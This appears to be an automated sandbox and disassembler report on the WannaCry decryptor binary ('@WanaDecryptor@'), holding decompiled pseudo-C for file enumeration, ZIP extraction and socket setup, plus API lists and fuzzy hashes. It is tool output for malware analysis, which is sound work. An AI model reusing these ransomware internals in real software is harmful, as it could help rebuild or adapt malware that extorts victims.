40895e _ftol 6298->6305 6307 40897e 6298->6307 6299 408817 #6194 6299->6285 6302 408ad5 #5785 6300->6302 6303 408ac6 #5785 6300->6303 6302->6311 6303->6311 6305->6307 6306 408afe #640 #755 6308 4089a7 FillRect 6307->6308 6309 4089b8 FillRect 6307->6309 6310 4089ca 6307->6310 6308->6310 6309->6310 6310->6311 6319 409f80 6310->6319 6322 409e20 #2414 6311->6322 6313 408a50 6314 409f10 2 API calls 6313->6314 6314->6311 6315->6294 6317 409f25 #5785 6316->6317 6318 409f18 #5785 6316->6318 6317->6299 6318->6299 6320 409f88 6319->6320 6321 409f8b BitBlt 6319->6321 6320->6321 6321->6313 6322->6306 6323 40c6e0 6324 40c722 #825 6323->6324 6325 40c6ef 

                                                      Control-flow Graph (function 4080c0; nodes marked Executed / Not Executed)
                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
                                                      				void _v999;
                                                      				char _v1000;
                                                      				void* _v1012;
                                                      				char _v1100;
                                                      				char _v1200;
                                                      				char _v1476;
                                                      				signed char _v1520;
                                                      				intOrPtr _v1648;
                                                      				void _v1656;
                                                      				intOrPtr _v1660;
                                                      				intOrPtr _v1664;
                                                      				intOrPtr _v1668;
                                                      				intOrPtr _v1672;
                                                      				intOrPtr _v1696;
                                                      				void _v1788;
                                                      				void _v1792;
                                                      				void* _v1796;
                                                      				char _v1800;
                                                      				intOrPtr _v1804;
                                                      				intOrPtr _v1808;
                                                      				void* _v1820;
                                                      				char _t44;
                                                      				void* _t47;
                                                      				void* _t50;
                                                      				void* _t54;
                                                      				int _t57;
                                                      				int _t60;
                                                      				struct _IO_FILE* _t61;
                                                      				int _t62;
                                                      				struct _WIN32_FIND_DATAA* _t74;
                                                      				intOrPtr _t103;
                                                      				void* _t104;
                                                      				struct _IO_FILE* _t105;
                                                      				void* _t110;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				void* _t126;
                                                      
                                                      				_t103 = __ecx;
                                                      				memset( &_v1788, 0, 0x21 << 2);
                                                      				_t44 =  *0x421798; // 0x0
                                                      				_v1000 = _t44;
                                                      				_v1808 = _t103;
                                                      				memset( &_v999, 0, 0xf9 << 2);
                                                      				_t110 =  &_v1808 + 0x18;
                                                      				asm("stosw");
                                                      				_t74 =  &_v1520;
                                                      				_v1804 = 0;
                                                      				asm("stosb"); // executed
                                                      				_t47 = FindFirstFileA("*.res", _t74); // executed
                                                      				_v1796 = _t47;
                                                      				if(_t47 == 0xffffffff) {
                                                      					L13:
                                                      					_push(_v1804);
                                                      					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                                      					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                                      					_t113 = _t110 + 0x30;
                                                      					_push(0);
                                                      					_v1808 = _t113;
                                                      					L00412CAA();
                                                      					_t79 = _t103;
                                                      					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                                      					if(_t54 != 0xffffffff) {
                                                      						return _t54;
                                                      					}
                                                      					_push(0);
                                                      					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                                      					L00412CAA();
                                                      					return E004082C0(_t103, _t113 + 0x340, _t79);
                                                      				} else {
                                                      					goto L2;
                                                      					L11:
                                                      					_t104 = _v1796;
                                                      					_t74 =  &_v1520;
                                                      					_t57 = FindNextFileA(_t104, _t74); // executed
                                                      					_t124 = _t57;
                                                      					if(_t57 != 0) {
                                                      						L2:
                                                      						if((_v1520 & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                                      								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                                      								_t110 = _t110 + 0xc;
                                                      								if(_t60 >= 1) {
                                                      									_t61 = fopen( &_v1476, "rb"); // executed
                                                      									_t105 = _t61;
                                                      									_t110 = _t110 + 8;
                                                      									if(_t105 != 0) {
                                                      										_t62 = fread( &_v1656, 0x88, 1, _t105); // executed
                                                      										_t114 = _t110 + 0x10;
                                                      										if(_t62 == 1 && _v1648 == _v1800) {
                                                      											_v1804 = _v1804 + 1;
                                                      										}
                                                      										fclose(_t105); // executed
                                                      										_t110 = _t114 + 4;
                                                      										if(_v1648 == 0) {
                                                      											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                                      											_t110 = _t110 + 0xc;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L11;
                                                      					} else {
                                                      						FindClose(_t104);
                                                      						_t103 = _v1808;
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (function 40d6a0; nodes marked Executed / Not Executed)
                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (function 411cf0; nodes marked Executed / Not Executed)
                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
                                                      				intOrPtr _t142;
                                                      				signed int _t147;
                                                      				signed int _t149;
                                                      				intOrPtr _t150;
                                                      				void* _t152;
                                                      				signed int _t157;
                                                      				signed int _t160;
                                                      				unsigned int _t162;
                                                      				signed char _t164;
                                                      				struct _FILETIME _t177;
                                                      				struct _FILETIME _t180;
                                                      				intOrPtr _t182;
                                                      				signed int _t186;
                                                      				signed char _t188;
                                                      				struct _FILETIME _t204;
                                                      				struct _FILETIME _t212;
                                                      				signed int _t215;
                                                      				signed int _t217;
                                                      				signed int _t219;
                                                      				intOrPtr* _t226;
                                                      				signed int _t231;
                                                      				signed int _t232;
                                                      				signed int _t234;
                                                      				signed int _t235;
                                                      				signed int _t239;
                                                      				unsigned int _t248;
                                                      				signed int _t249;
                                                      				int _t252;
                                                      				signed char _t264;
                                                      				intOrPtr _t269;
                                                      				intOrPtr* _t273;
                                                      				signed int _t276;
                                                      				unsigned int _t297;
                                                      				signed int _t299;
                                                      				intOrPtr _t300;
                                                      				signed int _t303;
                                                      				intOrPtr _t307;
                                                      				intOrPtr _t309;
                                                      				signed int _t311;
                                                      				intOrPtr _t312;
                                                      				intOrPtr _t313;
                                                      				intOrPtr* _t321;
                                                      				signed int _t329;
                                                      				intOrPtr* _t336;
                                                      				void* _t337;
                                                      				void* _t338;
                                                      				signed int _t340;
                                                      				signed int _t341;
                                                      				void* _t343;
                                                      				void* _t346;
                                                      				void* _t348;
                                                      				void* _t349;
                                                      				void* _t350;
                                                      				void* _t351;
                                                      				void* _t353;
                                                      				void* _t354;
                                                      				void* _t355;
                                                      				void* _t356;
                                                      
                                                      				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                                      				_t232 = _t231 | 0xffffffff;
                                                      				_t336 = __ecx;
                                                      				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                                      				if(_t312 < _t232) {
                                                      					L72:
                                                      					return 0x10000;
                                                      				} else {
                                                      					_t140 =  *__ecx;
                                                      					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                      						goto L72;
                                                      					} else {
                                                      						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                                      							E00411AC0(_t140);
                                                      							_t348 = _t348 + 4;
                                                      						}
                                                      						 *(_t336 + 4) = _t232;
                                                      						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                                      							__eflags = _t312 - _t232;
                                                      							if(_t312 != _t232) {
                                                      								_t142 =  *_t336;
                                                      								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                                      								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                                      									E00411390(_t142);
                                                      									_t348 = _t348 + 4;
                                                      								}
                                                      								_t143 =  *_t336;
                                                      								__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								while(__eflags < 0) {
                                                      									E004113E0(_t143);
                                                      									_t143 =  *_t336;
                                                      									_t348 = _t348 + 4;
                                                      									__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								}
                                                      								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                                      								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                                      								_t349 = _t348 + 0x30;
                                                      								__eflags = _t147;
                                                      								if(_t147 == 0) {
                                                      									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                                      									_t350 = _t349 + 0xc;
                                                      									__eflags = _t149;
                                                      									if(_t149 == 0) {
                                                      										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                                      										_push(_t150); // executed
                                                      										L00412CEC(); // executed
                                                      										_t313 = _t150;
                                                      										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                                      										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                                      										_t351 = _t350 + 0x14;
                                                      										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                                      										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                                      											_t346 =  *(_t351 + 0x29c);
                                                      											asm("repne scasb");
                                                      											_t248 =  !_t232;
                                                      											 *_t346 =  *( *_t336 + 0x10);
                                                      											_t337 = _t351 + 0x88 - _t248;
                                                      											_t249 = _t248 >> 2;
                                                      											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                                      											__eflags = _t252;
                                                      											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                                      											_t353 = _t351 + 0x18;
                                                      											_t321 = _t353 + 0x190;
                                                      											while(1) {
                                                      												_t157 =  *_t321;
                                                      												__eflags = _t157;
                                                      												if(_t157 == 0) {
                                                      													goto L23;
                                                      												}
                                                      												L21:
                                                      												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                                      												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                                      													_t321 = _t321 + 2;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												L23:
                                                      												__eflags = _t157 - 0x5c;
                                                      												if(_t157 == 0x5c) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												__eflags = _t157 - 0x2f;
                                                      												if(_t157 == 0x2f) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t41 = _t157 + 4; // 0x4
                                                      													_t321 = _t41;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t42 = _t157 + 4; // 0x4
                                                      													_t321 = _t42;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("/../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t43 = _t157 + 4; // 0x4
                                                      													_t321 = _t43;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      													goto L23;
                                                      												}
                                                      												_push("/..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t44 = _t157 + 4; // 0x4
                                                      													_t321 = _t44;
                                                      													continue;
                                                      												}
                                                      												asm("repne scasb");
                                                      												_t338 = _t321 -  !0xffffffff;
                                                      												_t297 =  *(_t353 + 0x70);
                                                      												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                                      												_t354 = _t353 + 0xc;
                                                      												 *((char*)(_t354 + 0x13)) = 0;
                                                      												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                                      												_t355 = _t354 + 0xc;
                                                      												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                                      												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                                      												_t340 =  *(_t355 + 0x3c) >> 8;
                                                      												__eflags = _t340;
                                                      												 *(_t355 + 0x12) = 0;
                                                      												_t234 = 1;
                                                      												if(_t340 == 0) {
                                                      													L39:
                                                      													_t264 = _t297 & 0x00000001;
                                                      													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                                      													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                                      													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                                      													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                                      													__eflags = _t299;
                                                      													_t234 = _t299;
                                                      												} else {
                                                      													__eflags = _t340 - 7;
                                                      													if(_t340 == 7) {
                                                      														goto L39;
                                                      													} else {
                                                      														__eflags = _t340 - 0xb;
                                                      														if(_t340 == 0xb) {
                                                      															goto L39;
                                                      														} else {
                                                      															__eflags = _t340 - 0xe;
                                                      															if(_t340 == 0xe) {
                                                      																goto L39;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												_t341 = 0;
                                                      												__eflags = _t164;
                                                      												 *(_t346 + 0x108) = 0;
                                                      												if(_t164 != 0) {
                                                      													 *(_t346 + 0x108) = 0x10;
                                                      												}
                                                      												__eflags = _t234;
                                                      												if(_t234 != 0) {
                                                      													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                                      													__eflags = _t219;
                                                      													 *(_t346 + 0x108) = _t219;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x13);
                                                      												if( *(_t355 + 0x13) != 0) {
                                                      													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                                      													__eflags = _t217;
                                                      													 *(_t346 + 0x108) = _t217;
                                                      												}
                                                      												__eflags = _t264;
                                                      												if(_t264 != 0) {
                                                      													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                                      													__eflags = _t215;
                                                      													 *(_t346 + 0x108) = _t215;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x12);
                                                      												if( *(_t355 + 0x12) != 0) {
                                                      													_t63 = _t346 + 0x108;
                                                      													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                                      													__eflags =  *_t63;
                                                      												}
                                                      												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                                      												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                                      												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                                      												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                                      												_t356 = _t355 + 8;
                                                      												 *(_t356 + 0x30) = _t177;
                                                      												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                                      												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                                      												_t180 =  *(_t356 + 0x28);
                                                      												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                                      												 *(_t346 + 0x10c) = _t180;
                                                      												 *(_t346 + 0x114) = _t180;
                                                      												 *(_t346 + 0x11c) = _t180;
                                                      												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                                      												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                                      												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      												} else {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      													 *((char*)(_t356 + 0x1a)) = 0;
                                                      													do {
                                                      														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                                      														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                                      														_t273 = "UT";
                                                      														_t186 = _t356 + 0x18;
                                                      														while(1) {
                                                      															_t235 =  *_t186;
                                                      															_t303 = _t235;
                                                      															__eflags = _t235 -  *_t273;
                                                      															if(_t235 !=  *_t273) {
                                                      																break;
                                                      															}
                                                      															__eflags = _t303;
                                                      															if(_t303 == 0) {
                                                      																L57:
                                                      																_t186 = 0;
                                                      															} else {
                                                      																_t239 =  *((intOrPtr*)(_t186 + 1));
                                                      																_t311 = _t239;
                                                      																_t92 = _t273 + 1; // 0x2f000054
                                                      																__eflags = _t239 -  *_t92;
                                                      																if(_t239 !=  *_t92) {
                                                      																	break;
                                                      																} else {
                                                      																	_t186 = _t186 + 2;
                                                      																	_t273 = _t273 + 2;
                                                      																	__eflags = _t311;
                                                      																	if(_t311 != 0) {
                                                      																		continue;
                                                      																	} else {
                                                      																		goto L57;
                                                      																	}
                                                      																}
                                                      															}
                                                      															L59:
                                                      															__eflags = _t186;
                                                      															if(_t186 == 0) {
                                                      																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                                      																_t343 = _t341 + 5;
                                                      																_t276 = 1;
                                                      																__eflags = _t188 & 0x00000001;
                                                      																 *((char*)(_t356 + 0x12)) = 1;
                                                      																if((_t188 & 0x00000001) != 0) {
                                                      																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x11c) = _t212;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                                      																}
                                                      																__eflags = 1;
                                                      																if(1 != 0) {
                                                      																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x10c) = _t204;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                                      																}
                                                      																__eflags = _t276;
                                                      																if(_t276 != 0) {
                                                      																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                                      																}
                                                      															} else {
                                                      																goto L60;
                                                      															}
                                                      															goto L69;
                                                      														}
                                                      														asm("sbb eax, eax");
                                                      														asm("sbb eax, 0xffffffff");
                                                      														goto L59;
                                                      														L60:
                                                      														_t341 = _t341 + 4;
                                                      														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                                      													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                                      												}
                                                      												L69:
                                                      												__eflags = _t329;
                                                      												if(_t329 != 0) {
                                                      													_push(_t329);
                                                      													L00412C98();
                                                      													_t356 = _t356 + 4;
                                                      												}
                                                      												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                                      												memcpy(_t182 + 8, _t346, 0x4b << 2);
                                                      												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                                      												__eflags = 0;
                                                      												return 0;
                                                      												goto L73;
                                                      											}
                                                      										} else {
                                                      											_push(_t313);
                                                      											L00412C98();
                                                      											return 0x800;
                                                      										}
                                                      									} else {
                                                      										return 0x800;
                                                      									}
                                                      								} else {
                                                      									return 0x700;
                                                      								}
                                                      							} else {
                                                      								goto L8;
                                                      							}
                                                      						} else {
                                                      							if(_t312 == _t232) {
                                                      								L8:
                                                      								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                                      								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                                      								 *((char*)(_t226 + 4)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                                      								__eflags = 0;
                                                      								return 0;
                                                      							} else {
                                                      								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                                      • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
                                                      				void* __ebp;
                                                      				signed int _t44;
                                                      				void* _t45;
                                                      				void* _t47;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t59;
                                                      				void* _t60;
                                                      				signed int _t65;
                                                      				signed int _t90;
                                                      				signed int _t91;
                                                      				signed int _t104;
                                                      				intOrPtr* _t106;
                                                      				struct _IO_FILE* _t107;
                                                      				signed int _t108;
                                                      				void* _t111;
                                                      				intOrPtr _t114;
                                                      				void* _t115;
                                                      				void* _t116;
                                                      				void* _t118;
                                                      				void* _t120;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FCE);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t114;
                                                      				_t115 = _t114 - 0x8c;
                                                      				_t111 = __ecx;
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                                      				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                                      				if(_t44 > 0x3e8) {
                                                      					_push(0x3e8);
                                                      					_push(0);
                                                      					_push(_t115 + 0x14);
                                                      					L00412F6E();
                                                      					_push(_t44);
